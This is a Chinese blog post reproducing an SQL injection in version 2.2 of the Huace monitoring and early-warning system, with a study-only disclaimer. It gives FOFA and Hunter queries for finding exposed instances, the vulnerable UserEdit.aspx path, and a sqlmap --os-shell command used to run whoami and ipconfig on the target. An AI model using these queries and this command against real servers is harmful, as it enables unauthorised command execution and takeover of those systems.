某站点华测监测预警系统2.2版本-sql注入漏洞复现

最新推荐文章于 2024-07-15 19:45:00 发布
最新推荐文章于 2024-07-15 19:45:00 发布
阅读量563 收藏 6
点赞数 11
文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35075142/article/details/136761926
版权

写在文前:

本人严格遵守我国法律法规,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请诸君严格遵守法律要求.

本文简要讲述简单的渗透测试以及相关sql注入漏洞的复现测试,仅用作学习研究。

本文转载本人在去年年末于NNNU公众号发布的文章:X010TeamNNNU,欢迎大家关注!

本博客所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

  1. 漏洞描述

    上海华测导航技术股份有限公司是一家专注于卫星导航领域的企业,公司成立于2001 年。作为国内唯一一家集北斗卫星应用产品研发、生产和销售为一体的单位,华测监测预警系统能够提供准确的监测结果和及时的预警信息,帮助用户避免设备故障、事故以及其他不良事件的发生,降低潜在风险和损失。通过渗透测试发现华测检测预警系统2.2版本存在sql注入漏洞。可通过该漏洞进行命令执行,写入shell,控制数据库等高危操作。

  2. 漏洞影响及资产收集

    (1)漏洞影响:华测监测预警系统2.2

    (2)FOFA语法app=”华测监测预警系统2.2”

    (3)Hunter语法web.body=”华测监测预警系统2.2”

  3. 漏洞位置

    /Web/SysManage/UserEdit.aspx?&ID=0

  4. 漏洞复现

  • 测试域名:XXXXXXXXXX.com

  • 测试URL:http://XXXXXXXXXX.com:7003

URL界面如下图1所示。

  • 将URL以及漏洞存在路径进行拼接得漏洞所在url

XXXXXXXXXXXXXXXXXX:7003/Web/SysManage/UserEdit.aspx?&ID=0

  • 将URL放入sqlmap:

Sqlmap -u "XXXXXXXXXXXXXX:7003/Web/SysManage/UserEdit.aspx?&ID=0" --os-shell –batch

如下图2所示。

尝试通过shell写入测试命令whoami,ipconfig,如下图3所示。

至此,测试完成。

Flyhha
关注
  • 11
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
监测预警系统2.2 UserEdit.aspx SQL注入致RCE漏洞(CVE-2023-5827)
0xSec
06-20 505
监测预警系统2.2 UserEdit.aspx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修
自动化监测方案样本.docx
12-17
自动化监测方案样本是一份详细的自动化监测系统设计方案,主要介绍导航技术股份有限公司的自动化监测系统的设计理念、技术优点和应用案例。 1.1 公司简介 导航技术股份有限公司是一家专业的自动化监测...
监测预警系统 2.2 存在任意文件读取漏洞
holyxp的博客
10-10 1074
监测预警系统是一套科学完善的地质灾害监测预警平台,实了地质灾害防治管理的科学化、信息化、标准化和可视化。
监测预警系统 2.2---任意文件读取漏洞
hackzkaq的博客
10-19 337
通过hackerbar 可以修改POST传参,或者利用BP构造请求包。最后直接用hunter找到有备案信息的公司,直接提交 盒子成功!个人推荐hunter可以看到icp备案公司直接提交盒子就行了。filepath是文件路径,这里访问后会直接下载文件到本地。这里的filename随便传参,只是一个文件名字。文件里包含了数据库的账号密码。这里手动的,目录是/
漏洞监测预警系统-FileDownLoad-文件读取
知黑而守白
01-11 157
监测预警系统 FileDownLoad 接口存在文件上传漏洞。攻击者可以通过发送特定的POST请求,利用该漏洞获取系统敏感文件。监测预警系统是一套科学完善的地质灾害监测预警平台,实了地质灾害防治管理的科学化、信息化、标准化和可视化。
漏洞--监测预警系统2.2任意文件读取
qq_53003652的博客
10-15 267
监测集成事业部充分利用在地质灾害监测方面的技术积累,建立了一套科学完善的地质灾害监测预警平台,实了地质灾害防治管理的科学化、信息化、标准化和可视化。该产品2.2版本FileDownLoad.ashx存在任意文件读取漏洞。此漏洞来自掌控安全学院。监测预警系统2.2。
广西钟马高速某高边坡自动化监测预警与变形分析.pdf
09-17
本文主要讨论的是广西钟马高速某高边坡的自动化监测预警与变形分析,这是一个针对高速公路建设中常见安全问题的研究案例。该高边坡位于广西壮族自治区贺州市昭平县樟木林乡平田村上滩寨背,历史上曾发生过滑坡象。...
滑坡监测系统.doc
09-27
滑坡监测系统.doc
地下水监测系统.doc
10-10
地下水监测系统】 一、概况 地下水监测系统是针对地下水环境监测而设计的一套代化技术方案,旨在实对地下水位、水质等关键参数的实时、自动化监测。在1.1流域简介中,我们可以了解到该系统适用于...
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 专题一
cao919的专栏Net
07-13 698
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只关注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
技术笔记
07-12 753
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
SQL笔试题【数据岗】
房东的猫的博客
07-11 305
题目 4:输出一张 dws 表,查询过去任意日期的曝光活跃用户的 7 日留存率,输出字 段日 期,用户 id,7 日留存率具体表结构如下表 1 用户行为表:t_user_video_action_d l分区:ds(格式 yyyyMMdd) l主键:user_id、video_id l含义:一个用户对一个视频的所有行为聚合,每天增量 字段名字段含义类型。题目 3:计算每个用户每天第一次曝光视频的时间戳,运行速度越快越好,输出字段 日期, 用户 id,时间戳。
【postgresql】视图(View)
一个写了10年bug的程序员日常笔记。
07-10 569
PostgreSQL 中的视图(View)是一种虚拟表,其内容由 SQL 查询定义。视图可以简化杂的 SQL 操作,使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的,因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器,当尝试 DELETE、INSERT 或 UPDATE 视图时触发,需要做的动作在触发器内容中定义。
SQL面试题-留存率计算
xiao4816的博客
07-07 411
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 541
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 219
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
NoSQL之Redis配置与优化
henanchenxuyuan的博客
07-11 1252
Redis(RemoteDictionaryServer,远程字典型)是一个开源的、使用C语言编写的NoSQL数据库。Redis 基于内存运行并支持持久化,采用 key-value(键值对)的存储形式是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis 进程,而 Redis 的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis 进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;
PostgreSQL的学习心得和知识总结(一百四十八)|查看 PostgreSQL 17 中的新内置排序规则提供程序
最新发布
孤傲小二~阿沐的博客
07-15 497
查看 PostgreSQL 17 中的新内置排序规则提供程序
Python 获取 SQL 指纹和 HASH 值
分享既学习
07-10 426
本文介绍一个提取 SQL 指纹的方法,就是将 SQL 语句的条件转换为?可用于脱敏和 SQL 聚类分析的场景。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Flyhha

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值